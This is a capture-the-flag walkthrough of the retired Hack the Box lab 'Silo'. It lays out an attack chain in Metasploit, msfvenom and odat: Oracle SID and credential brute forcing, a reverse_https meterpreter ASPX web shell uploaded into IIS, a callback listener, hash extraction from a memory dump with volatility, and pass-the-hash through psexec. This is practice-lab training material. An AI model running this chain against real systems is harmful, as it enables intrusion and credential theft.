CTF Challenges

Hack the Box: Silo Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Silo” which is available online for those who want to increase their skill in penetration testing and black box testing. Silo is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on the victim’s machine.

Steps Involved:

  1. Post scanning to discover open ports
  2. SID brute force
  3. Credential brute force
  4. Create payload
  5. Setup listener
  6. Upload shell with
  7. Getting meterpreter shell
  8. Finding user.txt
  9. Downloading zip file from dropbox
  10. Finding password hashes in memory dump
  11. Privilege escalation using pass the hash technique
  12. Finding root.txt

Since these labs are online available therefore they have static IP and IP of sense is so let’s begin with nmap port enumeration.

nmap -A

Fromthe given below image, you can observe we find only port 80, 135, 139, 445, 1521, 49152-49161 is open on the target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find that it contains the default IIS page.

We have oracle database listening remotely on port 1521, we need to find the valid SID and credentials in order to connect to the database.

We first need to get the SID for the oracle service, so we use metasploit to brute force the valid SID.

msf > use auxiliary/admin/oracle/sid_brute
msf auxiliary(admin/oracle/sid_brute) > set rhost
msf auxiliary(admin/oracle/sid_brute) > run

After finding the SID, we brute force the valid credentials using metasploit.

msf > use auxiliary/admin/oracle/oracle_login
msf auxiliary(admin/oracle/oracle_login) > set sid XE
msf auxiliary(admin/oracle/oracle_login) > set rhost
msf auxiliary(admin/oracle/oracle_login) > run


We are unable to get a shell with reverse_tcp, so we use the reverse_https payload. We create a 64-bit payload as the nmap scan shows us that the Operating system is 64-bit windows server.

msfvenom -p windows/x64/meterpreter/reverse_https lhost= lport=443 -f aspx > /tmp/Shell.aspx

We set up our listener before upload the payload to the target machine.

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set lhost
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run


We use this script called odat to further exploit the oracle database(you can download the script here). As we have the valid credentials and the valid SID we use this to login into the database and upload our asp shell in the IIS default directory.

./ dbmsxslprocessor -s -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" shell.aspx /tmp/Shell.aspx --sysdba

As soon as we run the shell on the target machine, we get a reverse shell.

Enumerating through the directories we find two files in “C:\Users\Phineas\Desktop” called “user.txt” and “Oracle issue.txt”. We take a look at the content of user.txt and find our first flag.

We take a look at the content of “Oracle issue.txt” and find a link to a dropbox and a password in which the first char is not being rendered by kali linux.

We find the unrecognized character to be the pound symbol (£). We use the password to login and find a zip file, we download the file into our system.

After downloading the zip file, we unzip it and find that it contains a memory dump. We use volatility tool to investigate the dump.

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist

We now can dump the hashes by supplying the need address which is SYSTEM and SAM.

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000

As we have the password hash for “Administrator” we use Pass the Hash technique to get a privileged shell.

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set smbuser Administrator
msf exploit(windows/smb/psexec) > set smbpass <hash>
msf exploit(windows/smb/psexec) > set rhost
msf exploit(windows/smb/psexec) > run

After getting a privileged shell, inside “C:\Users\Administrator\Desktop” we find a file called root.txt. We open root.txt and find the final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

%d bloggers like this: